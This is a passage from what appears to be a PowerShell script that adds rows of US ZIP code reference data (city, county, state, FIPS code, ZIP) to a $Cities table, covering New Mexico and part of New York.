$Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87110") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87111") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87112") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87113") + $null = $Cities.Rows.Add("Alameda","Bernalillo","New mexico","NM","35","87114") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87116") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87118") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87120") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87121") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87122") + $null = $Cities.Rows.Add("Albuquerque","Bernalillo","New mexico","NM","35","87123") + $null = $Cities.Rows.Add("Rio rancho","Sandoval","New mexico","NM","35","87124") + $null = $Cities.Rows.Add("Zcta 871xx","Sandoval","New mexico","NM","35","871XX") + $null = $Cities.Rows.Add("Gallup","McKinley","New mexico","NM","35","87301") + $null = $Cities.Rows.Add("Gallup","McKinley","New mexico","NM","35","87305") + $null = $Cities.Rows.Add("Brimhall","McKinley","New mexico","NM","35","87310") + $null = $Cities.Rows.Add("Church rock","McKinley","New mexico","NM","35","87311") + $null = $Cities.Rows.Add("Continental divi","McKinley","New mexico","NM","35","87312") + $null = $Cities.Rows.Add("Crownpoint","McKinley","New mexico","NM","35","87313") + $null = $Cities.Rows.Add("Fence lake","Cibola","New mexico","NM","35","87315") + $null = $Cities.Rows.Add("Fort wingate","McKinley","New mexico","NM","35","87316") + $null = $Cities.Rows.Add("Gamerco","McKinley","New mexico","NM","35","87317") + $null = $Cities.Rows.Add("Mentmore","McKinley","New mexico","NM","35","87319") + $null = $Cities.Rows.Add("Mexican springs","McKinley","New mexico","NM","35","87320") + $null = $Cities.Rows.Add("Ramah","Cibola","New mexico","NM","35","87321") + $null = $Cities.Rows.Add("Rehoboth","McKinley","New mexico","NM","35","87322") + $null = $Cities.Rows.Add("Thoreau","McKinley","New mexico","NM","35","87323") + $null = $Cities.Rows.Add("Tohatchi","McKinley","New mexico","NM","35","87325") + $null = $Cities.Rows.Add("Vanderwagen","McKinley","New mexico","NM","35","87326") + $null = $Cities.Rows.Add("Zuni","McKinley","New mexico","NM","35","87327") + $null = $Cities.Rows.Add("Navajo","McKinley","New mexico","NM","35","87328") + $null = $Cities.Rows.Add("Jamestown","McKinley","New mexico","NM","35","87347") + $null = $Cities.Rows.Add("Pinehill","Cibola","New mexico","NM","35","87357") + $null = $Cities.Rows.Add("Sheep springs","San Juan","New mexico","NM","35","87364") + $null = $Cities.Rows.Add("Yatahey","McKinley","New mexico","NM","35","87375") + $null = $Cities.Rows.Add("Zcta 873xx","Cibola","New mexico","NM","35","873XX") + $null = $Cities.Rows.Add("Farmington","San Juan","New mexico","NM","35","87401") + $null = $Cities.Rows.Add("Farmington","San Juan","New mexico","NM","35","87402") + $null = $Cities.Rows.Add("Aztec","San Juan","New mexico","NM","35","87410") + $null = $Cities.Rows.Add("Blanco","San Juan","New mexico","NM","35","87412") + $null = $Cities.Rows.Add("Bloomfield","San Juan","New mexico","NM","35","87413") + $null = $Cities.Rows.Add("Flora vista","San Juan","New mexico","NM","35","87415") + $null = $Cities.Rows.Add("Fruitland","San Juan","New mexico","NM","35","87416") + $null = $Cities.Rows.Add("Kirtland","San Juan","New mexico","NM","35","87417") + $null = $Cities.Rows.Add("La plata","San Juan","New mexico","NM","35","87418") + $null = $Cities.Rows.Add("Navajo dam","San Juan","New mexico","NM","35","87419") + $null = $Cities.Rows.Add("Shiprock","San Juan","New mexico","NM","35","87420") + $null = $Cities.Rows.Add("Waterflow","San Juan","New mexico","NM","35","87421") + $null = $Cities.Rows.Add("Newcomb","San Juan","New mexico","NM","35","87455") + $null = $Cities.Rows.Add("Sanostee","San Juan","New mexico","NM","35","87461") + $null = $Cities.Rows.Add("Zcta 874hh","San Juan","New mexico","NM","35","874HH") + $null = $Cities.Rows.Add("Zcta 874xx","San Juan","New mexico","NM","35","874XX") + $null = $Cities.Rows.Add("Pojoaque valley","Santa Fe","New mexico","NM","35","87501") + $null = $Cities.Rows.Add("Santa fe","Santa Fe","New mexico","NM","35","87505") + $null = $Cities.Rows.Add("Abiquiu","Rio Arriba","New mexico","NM","35","87510") + $null = $Cities.Rows.Add("Alcalde","Rio Arriba","New mexico","NM","35","87511") + $null = $Cities.Rows.Add("Amalia","Taos","New mexico","NM","35","87512") + $null = $Cities.Rows.Add("Arroyo hondo","Taos","New mexico","NM","35","87513") + $null = $Cities.Rows.Add("Arroyo seco","Taos","New mexico","NM","35","87514") + $null = $Cities.Rows.Add("Canjilon","Rio Arriba","New mexico","NM","35","87515") + $null = $Cities.Rows.Add("Canones","Rio Arriba","New mexico","NM","35","87516") + $null = $Cities.Rows.Add("Carson","Taos","New mexico","NM","35","87517") + $null = $Cities.Rows.Add("Cebolla","Rio Arriba","New mexico","NM","35","87518") + $null = $Cities.Rows.Add("Cerro","Taos","New mexico","NM","35","87519") + $null = $Cities.Rows.Add("Chama","Rio Arriba","New mexico","NM","35","87520") + $null = $Cities.Rows.Add("Chamisal","Taos","New mexico","NM","35","87521") + $null = $Cities.Rows.Add("Cundiyo","Rio Arriba","New mexico","NM","35","87522") + $null = $Cities.Rows.Add("Costilla","Taos","New mexico","NM","35","87524") + $null = $Cities.Rows.Add("Taos ski valley","Taos","New mexico","NM","35","87525") + $null = $Cities.Rows.Add("Dixon","Rio Arriba","New mexico","NM","35","87527") + $null = $Cities.Rows.Add("Dulce","Rio Arriba","New mexico","NM","35","87528") + $null = $Cities.Rows.Add("El prado","Taos","New mexico","NM","35","87529") + $null = $Cities.Rows.Add("El rito","Rio Arriba","New mexico","NM","35","87530") + $null = $Cities.Rows.Add("Embudo","Rio Arriba","New mexico","NM","35","87531") + $null = $Cities.Rows.Add("Espanola","Rio Arriba","New mexico","NM","35","87532") + $null = $Cities.Rows.Add("Fairview","Rio Arriba","New mexico","NM","35","87533") + $null = $Cities.Rows.Add("Glorieta","Santa Fe","New mexico","NM","35","87535") + $null = $Cities.Rows.Add("Hernandez","Rio Arriba","New mexico","NM","35","87537") + $null = $Cities.Rows.Add("La madera","Rio Arriba","New mexico","NM","35","87539") + $null = $Cities.Rows.Add("Lamy","Santa Fe","New mexico","NM","35","87540") + $null = $Cities.Rows.Add("Llano","Taos","New mexico","NM","35","87543") + $null = $Cities.Rows.Add("Los alamos","Los Alamos","New mexico","NM","35","87544") + $null = $Cities.Rows.Add("Medanales","Rio Arriba","New mexico","NM","35","87548") + $null = $Cities.Rows.Add("Ojo caliente","Rio Arriba","New mexico","NM","35","87549") + $null = $Cities.Rows.Add("Los ojos","Rio Arriba","New mexico","NM","35","87551") + $null = $Cities.Rows.Add("Pecos","San Miguel","New mexico","NM","35","87552") + $null = $Cities.Rows.Add("Penasco","Taos","New mexico","NM","35","87553") + $null = $Cities.Rows.Add("Questa","Taos","New mexico","NM","35","87556") + $null = $Cities.Rows.Add("Ranchos de taos","Taos","New mexico","NM","35","87557") + $null = $Cities.Rows.Add("Red river","Taos","New mexico","NM","35","87558") + $null = $Cities.Rows.Add("Ribera","San Miguel","New mexico","NM","35","87560") + $null = $Cities.Rows.Add("Rowe","San Miguel","New mexico","NM","35","87562") + $null = $Cities.Rows.Add("San cristobal","Taos","New mexico","NM","35","87564") + $null = $Cities.Rows.Add("San jose","San Miguel","New mexico","NM","35","87565") + $null = $Cities.Rows.Add("San juan pueblo","Rio Arriba","New mexico","NM","35","87566") + $null = $Cities.Rows.Add("Santa cruz","Santa Fe","New mexico","NM","35","87567") + $null = $Cities.Rows.Add("Serafina","San Miguel","New mexico","NM","35","87569") + $null = $Cities.Rows.Add("Taos","Taos","New mexico","NM","35","87571") + $null = $Cities.Rows.Add("Tererro","San Miguel","New mexico","NM","35","87573") + $null = $Cities.Rows.Add("Tierra amarilla","Rio Arriba","New mexico","NM","35","87575") + $null = $Cities.Rows.Add("Tres piedras","Taos","New mexico","NM","35","87577") + $null = $Cities.Rows.Add("Truchas","Rio Arriba","New mexico","NM","35","87578") + $null = $Cities.Rows.Add("Vadito","Taos","New mexico","NM","35","87579") + $null = $Cities.Rows.Add("Valdez","Taos","New mexico","NM","35","87580") + $null = $Cities.Rows.Add("Vallecitos","Rio Arriba","New mexico","NM","35","87581") + $null = $Cities.Rows.Add("Velarde","Rio Arriba","New mexico","NM","35","87582") + $null = $Cities.Rows.Add("Villanueva","San Miguel","New mexico","NM","35","87583") + $null = $Cities.Rows.Add("Zcta 875hh","Rio Arriba","New mexico","NM","35","875HH") + $null = $Cities.Rows.Add("Zcta 875xx","Taos","New mexico","NM","35","875XX") + $null = $Cities.Rows.Add("Las vegas","San Miguel","New mexico","NM","35","87701") + $null = $Cities.Rows.Add("Angel fire","Colfax","New mexico","NM","35","87710") + $null = $Cities.Rows.Add("Anton chico","Guadalupe","New mexico","NM","35","87711") + $null = $Cities.Rows.Add("Buena vista","Mora","New mexico","NM","35","87712") + $null = $Cities.Rows.Add("Chacon","Mora","New mexico","NM","35","87713") + $null = $Cities.Rows.Add("Cimarron","Colfax","New mexico","NM","35","87714") + $null = $Cities.Rows.Add("Cleveland","Mora","New mexico","NM","35","87715") + $null = $Cities.Rows.Add("Eagle nest","Colfax","New mexico","NM","35","87718") + $null = $Cities.Rows.Add("Guadalupita","Mora","New mexico","NM","35","87722") + $null = $Cities.Rows.Add("Holman","Mora","New mexico","NM","35","87723") + $null = $Cities.Rows.Add("La loma","Guadalupe","New mexico","NM","35","87724") + $null = $Cities.Rows.Add("Maxwell","Colfax","New mexico","NM","35","87728") + $null = $Cities.Rows.Add("Miami","Colfax","New mexico","NM","35","87729") + $null = $Cities.Rows.Add("Mills","Harding","New mexico","NM","35","87730") + $null = $Cities.Rows.Add("Montezuma","San Miguel","New mexico","NM","35","87731") + $null = $Cities.Rows.Add("Mora","Mora","New mexico","NM","35","87732") + $null = $Cities.Rows.Add("Albert","Harding","New mexico","NM","35","87733") + $null = $Cities.Rows.Add("Ocate","Mora","New mexico","NM","35","87734") + $null = $Cities.Rows.Add("Ojo feliz","Mora","New mexico","NM","35","87735") + $null = $Cities.Rows.Add("Rainsville","Mora","New mexico","NM","35","87736") + $null = $Cities.Rows.Add("Raton","Colfax","New mexico","NM","35","87740") + $null = $Cities.Rows.Add("Rociada","San Miguel","New mexico","NM","35","87742") + $null = $Cities.Rows.Add("Roy","Harding","New mexico","NM","35","87743") + $null = $Cities.Rows.Add("Sapello","San Miguel","New mexico","NM","35","87745") + $null = $Cities.Rows.Add("Springer","Colfax","New mexico","NM","35","87747") + $null = $Cities.Rows.Add("Valmora","Mora","New mexico","NM","35","87750") + $null = $Cities.Rows.Add("Wagon mound","Mora","New mexico","NM","35","87752") + $null = $Cities.Rows.Add("Watrous","Mora","New mexico","NM","35","87753") + $null = $Cities.Rows.Add("Zcta 877xx","San Miguel","New mexico","NM","35","877XX") + $null = $Cities.Rows.Add("Socorro","Socorro","New mexico","NM","35","87801") + $null = $Cities.Rows.Add("Aragon","Catron","New mexico","NM","35","87820") + $null = $Cities.Rows.Add("Datil","Catron","New mexico","NM","35","87821") + $null = $Cities.Rows.Add("Lemitar","Socorro","New mexico","NM","35","87823") + $null = $Cities.Rows.Add("Luna","Catron","New mexico","NM","35","87824") + $null = $Cities.Rows.Add("Alamo","Socorro","New mexico","NM","35","87825") + $null = $Cities.Rows.Add("Pie town","Catron","New mexico","NM","35","87827") + $null = $Cities.Rows.Add("Polvadera","Socorro","New mexico","NM","35","87828") + $null = $Cities.Rows.Add("Quemado","Catron","New mexico","NM","35","87829") + $null = $Cities.Rows.Add("Reserve","Catron","New mexico","NM","35","87830") + $null = $Cities.Rows.Add("San acacia","Socorro","New mexico","NM","35","87831") + $null = $Cities.Rows.Add("San antonio","Socorro","New mexico","NM","35","87832") + $null = $Cities.Rows.Add("Truth or consequ","Sierra","New mexico","NM","35","87901") + $null = $Cities.Rows.Add("Arrey","Sierra","New mexico","NM","35","87930") + $null = $Cities.Rows.Add("Caballo","Sierra","New mexico","NM","35","87931") + $null = $Cities.Rows.Add("Derry","Sierra","New mexico","NM","35","87933") + $null = $Cities.Rows.Add("Elephant butte","Sierra","New mexico","NM","35","87935") + $null = $Cities.Rows.Add("Garfield","Dona Ana","New mexico","NM","35","87936") + $null = $Cities.Rows.Add("Hatch","Dona Ana","New mexico","NM","35","87937") + $null = $Cities.Rows.Add("Monticello","Sierra","New mexico","NM","35","87939") + $null = $Cities.Rows.Add("Rincon","Dona Ana","New mexico","NM","35","87940") + $null = $Cities.Rows.Add("Salem","Dona Ana","New mexico","NM","35","87941") + $null = $Cities.Rows.Add("Williamsburg","Sierra","New mexico","NM","35","87942") + $null = $Cities.Rows.Add("Winston","Sierra","New mexico","NM","35","87943") + $null = $Cities.Rows.Add("Zcta 879hh","Sierra","New mexico","NM","35","879HH") + $null = $Cities.Rows.Add("Zcta 879xx","Sierra","New mexico","NM","35","879XX") + $null = $Cities.Rows.Add("Las cruces","Dona Ana","New mexico","NM","35","88001") + $null = $Cities.Rows.Add("White sands miss","Dona Ana","New mexico","NM","35","88002") + $null = $Cities.Rows.Add("Las cruces","Dona Ana","New mexico","NM","35","88003") + $null = $Cities.Rows.Add("Las cruces","Dona Ana","New mexico","NM","35","88004") + $null = $Cities.Rows.Add("Las cruces","Dona Ana","New mexico","NM","35","88005") + $null = $Cities.Rows.Add("Santa teresa","Dona Ana","New mexico","NM","35","88008") + $null = $Cities.Rows.Add("Playas","Hidalgo","New mexico","NM","35","88009") + $null = $Cities.Rows.Add("Las cruces","Dona Ana","New mexico","NM","35","88011") + $null = $Cities.Rows.Add("Las cruces","Dona Ana","New mexico","NM","35","88012") + $null = $Cities.Rows.Add("Animas","Hidalgo","New mexico","NM","35","88020") + $null = $Cities.Rows.Add("Chaparral","Dona Ana","New mexico","NM","35","88021") + $null = $Cities.Rows.Add("Arenas valley","Grant","New mexico","NM","35","88022") + $null = $Cities.Rows.Add("Vanadium","Grant","New mexico","NM","35","88023") + $null = $Cities.Rows.Add("Berino","Dona Ana","New mexico","NM","35","88024") + $null = $Cities.Rows.Add("Buckhorn","Grant","New mexico","NM","35","88025") + $null = $Cities.Rows.Add("Central","Grant","New mexico","NM","35","88026") + $null = $Cities.Rows.Add("Chamberino","Dona Ana","New mexico","NM","35","88027") + $null = $Cities.Rows.Add("Columbus","Luna","New mexico","NM","35","88029") + $null = $Cities.Rows.Add("Deming","Luna","New mexico","NM","35","88030") + $null = $Cities.Rows.Add("Fairacres","Dona Ana","New mexico","NM","35","88033") + $null = $Cities.Rows.Add("Fort bayard","Grant","New mexico","NM","35","88036") + $null = $Cities.Rows.Add("Gila","Grant","New mexico","NM","35","88038") + $null = $Cities.Rows.Add("Glenwood","Catron","New mexico","NM","35","88039") + $null = $Cities.Rows.Add("Hachita","Grant","New mexico","NM","35","88040") + $null = $Cities.Rows.Add("San lorenzo","Grant","New mexico","NM","35","88041") + $null = $Cities.Rows.Add("Hillsboro","Sierra","New mexico","NM","35","88042") + $null = $Cities.Rows.Add("Hurley","Grant","New mexico","NM","35","88043") + $null = $Cities.Rows.Add("La mesa","Dona Ana","New mexico","NM","35","88044") + $null = $Cities.Rows.Add("Road forks","Hidalgo","New mexico","NM","35","88045") + $null = $Cities.Rows.Add("Mesilla park","Dona Ana","New mexico","NM","35","88047") + $null = $Cities.Rows.Add("Mesquite","Dona Ana","New mexico","NM","35","88048") + $null = $Cities.Rows.Add("Mimbres","Grant","New mexico","NM","35","88049") + $null = $Cities.Rows.Add("Mule creek","Grant","New mexico","NM","35","88051") + $null = $Cities.Rows.Add("Organ","Dona Ana","New mexico","NM","35","88052") + $null = $Cities.Rows.Add("Pinos altos","Grant","New mexico","NM","35","88053") + $null = $Cities.Rows.Add("Redrock","Grant","New mexico","NM","35","88055") + $null = $Cities.Rows.Add("Rodeo","Hidalgo","New mexico","NM","35","88056") + $null = $Cities.Rows.Add("Silver city","Grant","New mexico","NM","35","88061") + $null = $Cities.Rows.Add("Sunland park","Dona Ana","New mexico","NM","35","88063") + $null = $Cities.Rows.Add("Tyrone","Grant","New mexico","NM","35","88065") + $null = $Cities.Rows.Add("Vado","Dona Ana","New mexico","NM","35","88072") + $null = $Cities.Rows.Add("Zcta 880xx","Grant","New mexico","NM","35","880XX") + $null = $Cities.Rows.Add("Clovis","Curry","New mexico","NM","35","88101") + $null = $Cities.Rows.Add("Broadview","Curry","New mexico","NM","35","88112") + $null = $Cities.Rows.Add("Causey","Roosevelt","New mexico","NM","35","88113") + $null = $Cities.Rows.Add("Crossroads","Lea","New mexico","NM","35","88114") + $null = $Cities.Rows.Add("Dora","Roosevelt","New mexico","NM","35","88115") + $null = $Cities.Rows.Add("Elida","Roosevelt","New mexico","NM","35","88116") + $null = $Cities.Rows.Add("Floyd","Roosevelt","New mexico","NM","35","88118") + $null = $Cities.Rows.Add("Fort sumner","DeBaca","New mexico","NM","35","88119") + $null = $Cities.Rows.Add("Grady","Curry","New mexico","NM","35","88120") + $null = $Cities.Rows.Add("House","Quay","New mexico","NM","35","88121") + $null = $Cities.Rows.Add("Melrose","Curry","New mexico","NM","35","88124") + $null = $Cities.Rows.Add("Milnesand","Roosevelt","New mexico","NM","35","88125") + $null = $Cities.Rows.Add("Pep","Roosevelt","New mexico","NM","35","88126") + $null = $Cities.Rows.Add("Portales","Roosevelt","New mexico","NM","35","88130") + $null = $Cities.Rows.Add("Rogers","Roosevelt","New mexico","NM","35","88132") + $null = $Cities.Rows.Add("Taiban","DeBaca","New mexico","NM","35","88134") + $null = $Cities.Rows.Add("Texico","Curry","New mexico","NM","35","88135") + $null = $Cities.Rows.Add("Yeso","DeBaca","New mexico","NM","35","88136") + $null = $Cities.Rows.Add("Roswell","Chaves","New mexico","NM","35","88201") + $null = $Cities.Rows.Add("Artesia","Eddy","New mexico","NM","35","88210") + $null = $Cities.Rows.Add("Caprock","Lea","New mexico","NM","35","88213") + $null = $Cities.Rows.Add("Carlsbad","Eddy","New mexico","NM","35","88220") + $null = $Cities.Rows.Add("Dexter","Chaves","New mexico","NM","35","88230") + $null = $Cities.Rows.Add("Eunice","Lea","New mexico","NM","35","88231") + $null = $Cities.Rows.Add("Hagerman","Chaves","New mexico","NM","35","88232") + $null = $Cities.Rows.Add("Hobbs","Lea","New mexico","NM","35","88240") + $null = $Cities.Rows.Add("Zcta 88242","Lea","New mexico","NM","35","88242") + $null = $Cities.Rows.Add("Hope","Eddy","New mexico","NM","35","88250") + $null = $Cities.Rows.Add("Jal","Lea","New mexico","NM","35","88252") + $null = $Cities.Rows.Add("Lake arthur","Eddy","New mexico","NM","35","88253") + $null = $Cities.Rows.Add("Lakewood","Eddy","New mexico","NM","35","88254") + $null = $Cities.Rows.Add("Loco hills","Eddy","New mexico","NM","35","88255") + $null = $Cities.Rows.Add("Loving","Eddy","New mexico","NM","35","88256") + $null = $Cities.Rows.Add("Lovington","Lea","New mexico","NM","35","88260") + $null = $Cities.Rows.Add("Mc donald","Lea","New mexico","NM","35","88262") + $null = $Cities.Rows.Add("Malaga","Eddy","New mexico","NM","35","88263") + $null = $Cities.Rows.Add("Maljamar","Lea","New mexico","NM","35","88264") + $null = $Cities.Rows.Add("Monument","Lea","New mexico","NM","35","88265") + $null = $Cities.Rows.Add("Tatum","Lea","New mexico","NM","35","88267") + $null = $Cities.Rows.Add("Whites city","Eddy","New mexico","NM","35","88268") + $null = $Cities.Rows.Add("Carrizozo","Lincoln","New mexico","NM","35","88301") + $null = $Cities.Rows.Add("Alamogordo","Otero","New mexico","NM","35","88310") + $null = $Cities.Rows.Add("Alto","Lincoln","New mexico","NM","35","88312") + $null = $Cities.Rows.Add("Bent","Otero","New mexico","NM","35","88314") + $null = $Cities.Rows.Add("Capitan","Lincoln","New mexico","NM","35","88316") + $null = $Cities.Rows.Add("Cloudcroft","Otero","New mexico","NM","35","88317") + $null = $Cities.Rows.Add("Corona","Lincoln","New mexico","NM","35","88318") + $null = $Cities.Rows.Add("Encino","Torrance","New mexico","NM","35","88321") + $null = $Cities.Rows.Add("Fort stanton","Lincoln","New mexico","NM","35","88323") + $null = $Cities.Rows.Add("Glencoe","Lincoln","New mexico","NM","35","88324") + $null = $Cities.Rows.Add("High rolls mount","Otero","New mexico","NM","35","88325") + $null = $Cities.Rows.Add("Holloman air for","Otero","New mexico","NM","35","88330") + $null = $Cities.Rows.Add("Hondo","Lincoln","New mexico","NM","35","88336") + $null = $Cities.Rows.Add("La luz","Otero","New mexico","NM","35","88337") + $null = $Cities.Rows.Add("Lincoln","Lincoln","New mexico","NM","35","88338") + $null = $Cities.Rows.Add("Mayhill","Otero","New mexico","NM","35","88339") + $null = $Cities.Rows.Add("Mescalero","Otero","New mexico","NM","35","88340") + $null = $Cities.Rows.Add("Nogal","Lincoln","New mexico","NM","35","88341") + $null = $Cities.Rows.Add("Picacho","Lincoln","New mexico","NM","35","88343") + $null = $Cities.Rows.Add("Pinon","Otero","New mexico","NM","35","88344") + $null = $Cities.Rows.Add("Ruidoso","Lincoln","New mexico","NM","35","88345") + $null = $Cities.Rows.Add("Ruidoso downs","Lincoln","New mexico","NM","35","88346") + $null = $Cities.Rows.Add("Sacramento","Otero","New mexico","NM","35","88347") + $null = $Cities.Rows.Add("San patricio","Lincoln","New mexico","NM","35","88348") + $null = $Cities.Rows.Add("Timberon","Otero","New mexico","NM","35","88350") + $null = $Cities.Rows.Add("Tinnie","Lincoln","New mexico","NM","35","88351") + $null = $Cities.Rows.Add("Tularosa","Otero","New mexico","NM","35","88352") + $null = $Cities.Rows.Add("Vaughn","Guadalupe","New mexico","NM","35","88353") + $null = $Cities.Rows.Add("Weed","Otero","New mexico","NM","35","88354") + $null = $Cities.Rows.Add("Zcta 883xx","Otero","New mexico","NM","35","883XX") + $null = $Cities.Rows.Add("Tucumcari","Quay","New mexico","NM","35","88401") + $null = $Cities.Rows.Add("Amistad","Union","New mexico","NM","35","88410") + $null = $Cities.Rows.Add("Bard","Quay","New mexico","NM","35","88411") + $null = $Cities.Rows.Add("Capulin","Union","New mexico","NM","35","88414") + $null = $Cities.Rows.Add("Clayton","Union","New mexico","NM","35","88415") + $null = $Cities.Rows.Add("Conchas dam","San Miguel","New mexico","NM","35","88416") + $null = $Cities.Rows.Add("Cuervo","Guadalupe","New mexico","NM","35","88417") + $null = $Cities.Rows.Add("Des moines","Union","New mexico","NM","35","88418") + $null = $Cities.Rows.Add("Folsom","Union","New mexico","NM","35","88419") + $null = $Cities.Rows.Add("Garita","San Miguel","New mexico","NM","35","88421") + $null = $Cities.Rows.Add("Gladstone","Union","New mexico","NM","35","88422") + $null = $Cities.Rows.Add("Grenville","Union","New mexico","NM","35","88424") + $null = $Cities.Rows.Add("Logan","Quay","New mexico","NM","35","88426") + $null = $Cities.Rows.Add("Mc alister","Quay","New mexico","NM","35","88427") + $null = $Cities.Rows.Add("Nara visa","Quay","New mexico","NM","35","88430") + $null = $Cities.Rows.Add("Newkirk","Guadalupe","New mexico","NM","35","88431") + $null = $Cities.Rows.Add("San jon","Quay","New mexico","NM","35","88434") + $null = $Cities.Rows.Add("Pastura","Guadalupe","New mexico","NM","35","88435") + $null = $Cities.Rows.Add("Sedan","Union","New mexico","NM","35","88436") + $null = $Cities.Rows.Add("Seneca","Union","New mexico","NM","35","88437") + $null = $Cities.Rows.Add("Zcta 884hh","San Miguel","New mexico","NM","35","884HH") + $null = $Cities.Rows.Add("","Suffolk","New york","NY","36","06390") + $null = $Cities.Rows.Add("","Suffolk","New york","NY","36","063HH") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10001") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10002") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10003") + $null = $Cities.Rows.Add("Governors island","New York","New york","NY","36","10004") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10005") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10006") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10007") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10009") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10010") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10011") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10012") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10013") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10014") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10016") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10017") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10018") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10019") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10020") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10021") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10022") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10023") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10024") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10025") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10026") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10027") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10028") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10029") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10030") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10031") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10032") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10033") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10034") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10035") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10036") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10037") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10038") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10039") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10040") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10041") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10044") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10048") + $null = $Cities.Rows.Add("Zcta 10069","New York","New york","NY","36","10069") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","100HH") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10103") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10111") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10112") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10115") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10119") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10128") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10152") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10153") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10154") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10162") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10165") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10167") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10169") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10170") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10171") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10172") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10173") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10177") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10271") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10278") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10279") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10280") + $null = $Cities.Rows.Add("New york","New York","New york","NY","36","10282") + $null = $Cities.Rows.Add("Zcta 102hh","New York","New york","NY","36","102HH") + $null = $Cities.Rows.Add("Staten island","Richmond","New york","NY","36","10301") + $null = $Cities.Rows.Add("Staten island","Richmond","New york","NY","36","10302") + $null = $Cities.Rows.Add("Staten island","Richmond","New york","NY","36","10303") + $null = $Cities.Rows.Add("Staten island","Richmond","New york","NY","36","10304") + $null = $Cities.Rows.Add("Staten island","Richmond","New york","NY","36","10305") + $null = $Cities.Rows.Add("Staten island","Richmond","New york","NY","36","10306") + $null = $Cities.Rows.Add("Staten island","Richmond","New york","NY","36","10307") + $null = $Cities.Rows.Add("Staten island","Richmond","New york","NY","36","10308") + $null = $Cities.Rows.Add("Staten island","Richmond","New york","NY","36","10309") + $null = $Cities.Rows.Add("Staten island","Richmond","New york","NY","36","10310") + $null = $Cities.Rows.Add("Staten island","Richmond","New york","NY","36","10312") + $null = $Cities.Rows.Add("Staten island","Richmond","New york","NY","36","10314") + $null = $Cities.Rows.Add("Zcta 103hh","Richmond","New york","NY","36","103HH") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10451") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10452") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10453") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10454") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10455") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10456") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10457") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10458") + $null = 